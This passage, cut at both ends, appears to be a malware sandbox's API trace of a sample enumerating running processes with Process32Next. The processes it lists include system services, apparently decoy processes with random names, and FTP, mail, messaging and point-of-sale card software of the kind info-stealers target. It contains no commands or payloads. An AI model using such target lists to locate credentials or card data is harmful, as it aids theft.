th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.442] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.443] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.444] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.447] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.448] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.450] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.452] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.453] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.455] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.456] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.496] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.498] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.499] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0218.501] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.503] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0218.504] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.506] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0218.507] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0218.509] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0218.511] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0218.512] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.514] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0218.515] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.517] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.518] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0218.520] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.521] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0218.523] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.525] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0218.526] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0218.529] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0218.530] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0218.532] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0218.570] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0218.572] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0218.574] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0218.576] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0218.577] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0218.579] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0218.580] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0218.582] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0218.583] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0218.585] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0218.587] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0218.592] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0218.594] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0218.596] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0218.598] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0218.599] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0218.601] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0218.603] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0218.605] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0218.607] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0218.647] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0218.649] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0218.651] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0218.653] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0218.655] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0218.657] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0218.663] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0218.665] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0218.667] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0218.670] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0218.672] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0218.674] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0218.676] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0218.678] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0218.680] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0218.682] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0218.684] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0218.724] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0218.726] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0218.728] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0218.730] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0218.731] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0218.733] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0218.735] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0218.737] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0218.739] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0218.741] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0218.743] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0218.745] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 